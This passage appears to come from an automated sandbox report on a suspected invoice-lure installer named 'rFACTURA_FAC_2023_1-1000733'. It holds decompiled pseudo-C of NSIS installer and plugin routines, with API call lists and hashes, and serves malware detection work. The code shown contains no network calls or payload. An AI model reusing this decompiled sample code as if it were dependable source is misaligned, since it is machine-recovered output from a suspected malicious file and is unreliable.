                                                                                                  								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                                  								goto L14;
                                                                                                  							case 3:
                                                                                                  								__ecx =  *0x1000406c;
                                                                                                  								__edx = __ecx - 1;
                                                                                                  								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
                                                                                                  								__eax =  *0x1000406c;
                                                                                                  								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
                                                                                                  								goto L15;
                                                                                                  							case 4:
                                                                                                  								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
                                                                                                  								goto L15;
                                                                                                  							case 5:
                                                                                                  								_push( *0x1000406c);
                                                                                                  								_push(__edi);
                                                                                                  								_push( *__eax);
                                                                                                  								__imp__StringFromGUID2();
                                                                                                  								goto L15;
                                                                                                  							case 6:
                                                                                                  								_push( *__esi);
                                                                                                  								L13:
                                                                                                  								__eax = wsprintfW(__edi, __ebp);
                                                                                                  								L14:
                                                                                                  								__esp = __esp + 0xc;
                                                                                                  								goto L15;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					L15:
                                                                                                  					_t26 =  *(_t43 + 0x14);
                                                                                                  					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                                  						GlobalFree(_t26);
                                                                                                  					}
                                                                                                  					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                                  					if(_t27 != 0) {
                                                                                                  						if(_t27 != 0xffffffff) {
                                                                                                  							if(_t27 > 0) {
                                                                                                  								E100012E1(_t27 - 1, _t39);
                                                                                                  								goto L24;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							E10001272(_t39);
                                                                                                  							L24:
                                                                                                  						}
                                                                                                  					}
                                                                                                  					_v4 = _v4 - 1;
                                                                                                  					_t43 = _t43 - 0x20;
                                                                                                  				} while (_v4 >= 0);
                                                                                                  				return GlobalFree(_t39);
                                                                                                  			}












                                                                                                  APIs
                                                                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                  • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1780285237-0
                                                                                                  • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                  • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                                                  • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                  • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E004028A7(void* __ebx) {
                                                                                                  				void* _t26;
                                                                                                  				long _t31;
                                                                                                  				void* _t45;
                                                                                                  				void* _t49;
                                                                                                  				void* _t51;
                                                                                                  				void* _t54;
                                                                                                  				void* _t55;
                                                                                                  				void* _t56;
                                                                                                  
                                                                                                  				_t45 = __ebx;
                                                                                                  				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
                                                                                                  				_t50 = E00402C37(0xfffffff0);
                                                                                                  				 *(_t56 - 0x38) = _t23;
                                                                                                  				if(E00405BA7(_t50) == 0) {
                                                                                                  					E00402C37(0xffffffed);
                                                                                                  				}
                                                                                                  				E00405D2C(_t50);
                                                                                                  				_t26 = E00405D51(_t50, 0x40000000, 2);
                                                                                                  				 *(_t56 + 8) = _t26;
                                                                                                  				if(_t26 != 0xffffffff) {
                                                                                                  					_t31 =  *0x7a8a38;
                                                                                                  					 *(_t56 - 0x3c) = _t31;
                                                                                                  					_t49 = GlobalAlloc(0x40, _t31);
                                                                                                  					if(_t49 != _t45) {
                                                                                                  						E00403308(_t45);
                                                                                                  						E004032F2(_t49,  *(_t56 - 0x3c));
                                                                                                  						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                                                  						 *(_t56 - 0x4c) = _t54;
                                                                                                  						if(_t54 != _t45) {
                                                                                                  							_push( *(_t56 - 0x20));
                                                                                                  							_push(_t54);
                                                                                                  							_push(_t45);
                                                                                                  							_push( *((intOrPtr*)(_t56 - 0x24)));
                                                                                                  							E004030FA();
                                                                                                  							while( *_t54 != _t45) {
                                                                                                  								_t47 =  *_t54;
                                                                                                  								_t55 = _t54 + 8;
                                                                                                  								 *(_t56 - 0x34) =  *_t54;
                                                                                                  								E00405D0C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                                  								_t54 = _t55 +  *(_t56 - 0x34);
                                                                                                  							}
                                                                                                  							GlobalFree( *(_t56 - 0x4c));
                                                                                                  						}
                                                                                                  						E00405E03( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
                                                                                                  						GlobalFree(_t49);
                                                                                                  						_push(_t45);
                                                                                                  						_push(_t45);
                                                                                                  						_push( *(_t56 + 8));
                                                                                                  						_push(0xffffffff);
                                                                                                  						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA();
                                                                                                  					}
                                                                                                  					CloseHandle( *(_t56 + 8));
                                                                                                  				}
                                                                                                  				_t51 = 0xfffffff3;
                                                                                                  				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
                                                                                                  					_t51 = 0xffffffef;
                                                                                                  					DeleteFileW( *(_t56 - 0x38));
                                                                                                  					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                                  				}
                                                                                                  				_push(_t51);
                                                                                                  				E00401423();
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t56 - 4));
                                                                                                  				return 0;
                                                                                                  			}












                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                                                  • GlobalFree.KERNEL32(?), ref: 00402950
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2667972263-0
                                                                                                  • Opcode ID: c80f1b7699c573d2cd61cc0fc8ca34bd45e7fada534f6731a09c6b940c6eaf41
                                                                                                  • Instruction ID: bbedb4fc7ab5ed61472c20f64d7886a30c327f5f8cbd10d414b970b30e546654
                                                                                                  • Opcode Fuzzy Hash: c80f1b7699c573d2cd61cc0fc8ca34bd45e7fada534f6731a09c6b940c6eaf41
                                                                                                  • Instruction Fuzzy Hash: E021DDB1800128BBCF206FA5DE49D9E7E79EF08364F10423AF960762E0CB394D418F98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 88%
                                                                                                  			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
                                                                                                  				signed int _t14;
                                                                                                  				int _t17;
                                                                                                  				int _t24;
                                                                                                  				signed int _t29;
                                                                                                  				intOrPtr* _t32;
                                                                                                  				void* _t34;
                                                                                                  				void* _t35;
                                                                                                  				void* _t38;
                                                                                                  				signed int _t40;
                                                                                                  
                                                                                                  				_t32 = __esi;
                                                                                                  				_t24 = __ebx;
                                                                                                  				_t14 =  *(_t35 - 0x20);
                                                                                                  				_t38 = __edx - 0x38;
                                                                                                  				 *(_t35 - 0x4c) = _t14;
                                                                                                  				_t27 = 0 | _t38 == 0x00000000;
                                                                                                  				_t29 = _t38 == 0;
                                                                                                  				if(_t14 == __ebx) {
                                                                                                  					if(__edx != 0x38) {
                                                                                                  						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
                                                                                                  					} else {
                                                                                                  						E00402C37(0x21);
                                                                                                  						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp\System.dll", 0x400, __ebx, __ebx);
                                                                                                  						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp\System.dll");
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					E00402C15("true");
                                                                                                  					 *0x40ada8 = __ax;
                                                                                                  					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
                                                                                                  				}
                                                                                                  				 *(_t35 + 8) = _t17;
                                                                                                  				if( *_t32 == _t24) {
                                                                                                  					L13:
                                                                                                  					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                                  				} else {
                                                                                                  					_t34 = E004061BF(_t27, _t32);
                                                                                                  					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E32(_t34, _t34) >= 0) {
                                                                                                  						_t14 = E00405E03(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp\System.dll",  *(_t35 + 8));
                                                                                                  						_t40 = _t14;
                                                                                                  						if(_t40 == 0) {
                                                                                                  							goto L13;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						goto L13;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                  				return 0;
                                                                                                  			}













                                                                                                  APIs
                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp$C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll
                                                                                                  • API String ID: 3109718747-44410490
                                                                                                  • Opcode ID: b12df498abedb34b717a172da15718af2b4b4c367ff4dc2f2e44eabaa543b304
                                                                                                  • Instruction ID: aeea25b17c56a12648c97371da72875efc2076f5b2bafbb971aab2720b62453c
                                                                                                  • Opcode Fuzzy Hash: b12df498abedb34b717a172da15718af2b4b4c367ff4dc2f2e44eabaa543b304
                                                                                                  • Instruction Fuzzy Hash: B5115B72A00200BECB106FB18E8D99F7664AF95389F20843FF502F22C1DAFC49425B5E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 85%
                                                                                                  			E100022D0(void* __edx) {
                                                                                                  				void* _t37;
                                                                                                  				signed int _t38;
                                                                                                  				void* _t39;
                                                                                                  				void* _t41;
                                                                                                  				signed int* _t42;
                                                                                                  				signed int* _t51;
                                                                                                  				void* _t52;
                                                                                                  				void* _t54;
                                                                                                  
                                                                                                  				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                                  				while(1) {
                                                                                                  					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                                  					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                                  					_t52 = _t51[6];
                                                                                                  					if(_t52 == 0) {
                                                                                                  						goto L9;
                                                                                                  					}
                                                                                                  					_t41 = 0x1a;
                                                                                                  					if(_t52 == _t41) {
                                                                                                  						goto L9;
                                                                                                  					}
                                                                                                  					if(_t52 != 0xffffffff) {
                                                                                                  						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                                  							_t51[6] = _t41;
                                                                                                  							goto L12;
                                                                                                  						} else {
                                                                                                  							_t37 = E100012BA(_t52 - 1);
                                                                                                  							L10:
                                                                                                  							goto L11;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_t37 = E10001243();
                                                                                                  						L11:
                                                                                                  						_t52 = _t37;
                                                                                                  						L12:
                                                                                                  						_t13 =  &(_t51[2]); // 0x1020
                                                                                                  						_t42 = _t13;
                                                                                                  						if(_t51[1] != 0xffffffff) {
                                                                                                  						}
                                                                                                  						_t38 =  *_t51;
                                                                                                  						_t51[7] = 0;
                                                                                                  						if(_t38 > 7) {
                                                                                                  							L27:
                                                                                                  							_t39 = GlobalFree(_t52);
                                                                                                  							if( *(_t54 + 0x10) == 0) {
                                                                                                  								return _t39;
                                                                                                  							}
                                                                                                  							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                                  								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                                  							} else {
                                                                                                  								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                                  							}
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
                                                                                                  								case 0:
                                                                                                  									 *_t42 = 0;
                                                                                                  									goto L27;
                                                                                                  								case 1:
                                                                                                  									__eax = E10001311(__ebp);
                                                                                                  									goto L21;
                                                                                                  								case 2:
                                                                                                  									 *__edi = E10001311(__ebp);
                                                                                                  									__edi[1] = __edx;
                                                                                                  									goto L27;
                                                                                                  								case 3:
                                                                                                  									__eax = GlobalAlloc(0x40,  *0x1000406c);
                                                                                                  									 *(__esi + 0x1c) = __eax;
                                                                                                  									__edx = 0;
                                                                                                  									 *__edi = __eax;
                                                                                                  									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
                                                                                                  									goto L27;
                                                                                                  								case 4:
                                                                                                  									__eax = E1000122C(__ebp);
                                                                                                  									 *(__esi + 0x1c) = __eax;
                                                                                                  									L21:
                                                                                                  									 *__edi = __eax;
                                                                                                  									goto L27;
                                                                                                  								case 5:
                                                                                                  									__eax = GlobalAlloc(0x40, 0x10);
                                                                                                  									_push(__eax);
                                                                                                  									 *(__esi + 0x1c) = __eax;
                                                                                                  									_push(__ebp);
                                                                                                  									 *__edi = __eax;
                                                                                                  									__imp__CLSIDFromString();
                                                                                                  									goto L27;
                                                                                                  								case 6:
                                                                                                  									if( *__ebp != __cx) {
                                                                                                  										__eax = E10001311(__ebp);
                                                                                                  										 *__ebx = __eax;
                                                                                                  									}
                                                                                                  									goto L27;
                                                                                                  								case 7:
                                                                                                  									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                                  									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                                                                  									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                                                                  									asm("cdq");
                                                                                                  									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
                                                                                                  									goto L27;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					L9:
                                                                                                  					_t37 = E1000122C(0x10004044);
                                                                                                  					goto L10;
                                                                                                  				}
                                                                                                  			}












                                                                                                  APIs
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                                                    • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                  • String ID:
                                                                                                  • API String ID: 4216380887-0
                                                                                                  • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                  • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                                                  • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                                                  • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
                                                                                                  				_Unknown_base(*)()* _t7;
                                                                                                  				void* _t10;
                                                                                                  				int _t14;
                                                                                                  
                                                                                                  				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                                  				_t10 = GlobalAlloc(0x40, _t14);
                                                                                                  				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                                  				_t7 = GetProcAddress(_a4, _t10);
                                                                                                  				GlobalFree(_t10);
                                                                                                  				return _t7;
                                                                                                  			}







                                                                                                  APIs
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                  • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  • Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1148316912-0
                                                                                                  • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                  • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                  • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                  • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00401D57() {
                                                                                                  				void* _t18;
                                                                                                  				struct HINSTANCE__* _t22;
                                                                                                  				struct HWND__* _t25;
                                                                                                  				void* _t27;
                                                                                                  
                                                                                                  				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
                                                                                                  				GetClientRect(_t25, _t27 - 0x58);
                                                                                                  				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
                                                                                                  				if(_t18 != _t22) {
                                                                                                  					DeleteObject(_t18);
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t27 - 4));
                                                                                                  				return 0;
                                                                                                  			}








                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1849352358-0
                                                                                                  • Opcode ID: 3d379d5cf174b1f3754fd0e8aded0e40a14ad1f56653ff3a87a584377fb567a4
                                                                                                  • Instruction ID: d6b80873b4a6bbd9af873cfa92cf23dd081e8a17906ab7f6c0372a94bb23d9f5
                                                                                                  • Opcode Fuzzy Hash: 3d379d5cf174b1f3754fd0e8aded0e40a14ad1f56653ff3a87a584377fb567a4
                                                                                                  • Instruction Fuzzy Hash: 03F0ECB2604518AFDB41DBE4DE88CEEB7BCEB48341B14446AF641F6191CA789D118B68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 77%
                                                                                                  			E00404A7F(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                  				char _v68;
                                                                                                  				char _v132;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t23;
                                                                                                  				signed int _t24;
                                                                                                  				void* _t31;
                                                                                                  				void* _t33;
                                                                                                  				void* _t34;
                                                                                                  				void* _t44;
                                                                                                  				signed int _t46;
                                                                                                  				signed int _t50;
                                                                                                  				signed int _t52;
                                                                                                  				signed int _t53;
                                                                                                  				signed int _t55;
                                                                                                  
                                                                                                  				_t23 = _a16;
                                                                                                  				_t53 = _a12;
                                                                                                  				_t44 = 0xffffffdc;
                                                                                                  				if(_t23 == 0) {
                                                                                                  					_push(0x14);
                                                                                                  					_pop(0);
                                                                                                  					_t24 = _t53;
                                                                                                  					if(_t53 < 0x100000) {
                                                                                                  						_push(0xa);
                                                                                                  						_pop(0);
                                                                                                  						_t44 = 0xffffffdd;
                                                                                                  					}
                                                                                                  					if(_t53 < 0x400) {
                                                                                                  						_t44 = 0xffffffde;
                                                                                                  					}
                                                                                                  					if(_t53 < 0xffff3333) {
                                                                                                  						_t52 = 0x14;
                                                                                                  						asm("cdq");
                                                                                                  						_t24 = 1 / _t52 + _t53;
                                                                                                  					}
                                                                                                  					_t25 = _t24 & 0x00ffffff;
                                                                                                  					_t55 = _t24 >> 0;
                                                                                                  					_t46 = 0xa;
                                                                                                  					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                                  				} else {
                                                                                                  					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                                  					_t50 = 0;
                                                                                                  				}
                                                                                                  				_t31 = E00406281(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                                  				_t33 = E00406281(_t44, _t50, _t55,  &_v132, _t44);
                                                                                                  				_t34 = E00406281(_t44, _t50, 0x7a1f20, 0x7a1f20, _a8);
                                                                                                  				wsprintfW(_t34 + lstrlenW(0x7a1f20) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                                  				return SetDlgItemTextW( *0x7a79f8, _a4, 0x7a1f20);
                                                                                                  			}



















                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 00404B20
                                                                                                  • wsprintfW.USER32 ref: 00404B29
                                                                                                  • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B3C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                  • String ID: %u.%u%s%s
                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                  • Opcode ID: e52f1a5f5cfb5a9a0e1921420a7f7e901b35480ee7d38de5188ba9653754f71b
                                                                                                  • Instruction ID: e59333b35207274dfa12745fa15a0a2b1e84881af2dc0bba7fa0e94120285970
                                                                                                  • Opcode Fuzzy Hash: e52f1a5f5cfb5a9a0e1921420a7f7e901b35480ee7d38de5188ba9653754f71b
                                                                                                  • Instruction Fuzzy Hash: AD11EB73A441283BDB00A66D9C45E9E3298DB85374F250237FE26F21D1DD78C82286E8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 59%
                                                                                                  			E00401C19(intOrPtr __edx) {
                                                                                                  				int _t29;
                                                                                                  				long _t30;
                                                                                                  				signed int _t32;
                                                                                                  				WCHAR* _t35;
                                                                                                  				long _t36;
                                                                                                  				int _t41;
                                                                                                  				signed int _t42;
                                                                                                  				int _t46;
                                                                                                  				int _t56;
                                                                                                  				intOrPtr _t57;
                                                                                                  				struct HWND__* _t61;
                                                                                                  				void* _t64;
                                                                                                  
                                                                                                  				_t57 = __edx;
                                                                                                  				_t29 = E00402C15(3);
                                                                                                  				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                  				 *(_t64 - 0x10) = _t29;
                                                                                                  				_t30 = E00402C15("true");
                                                                                                  				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                  				 *(_t64 + 8) = _t30;
                                                                                                  				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                                                  					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
                                                                                                  				}
                                                                                                  				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                                                  				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                                                  					 *(_t64 + 8) = E00402C37(0x44);
                                                                                                  				}
                                                                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                                                  				_push("true");
                                                                                                  				if(__eflags != 0) {
                                                                                                  					_t59 = E00402C37();
                                                                                                  					_t32 = E00402C37();
                                                                                                  					asm("sbb ecx, ecx");
                                                                                                  					asm("sbb eax, eax");
                                                                                                  					_t35 =  ~( *_t31) & _t59;
                                                                                                  					__eflags = _t35;
                                                                                                  					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                                                  					goto L10;
                                                                                                  				} else {
                                                                                                  					_t61 = E00402C15();
                                                                                                  					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
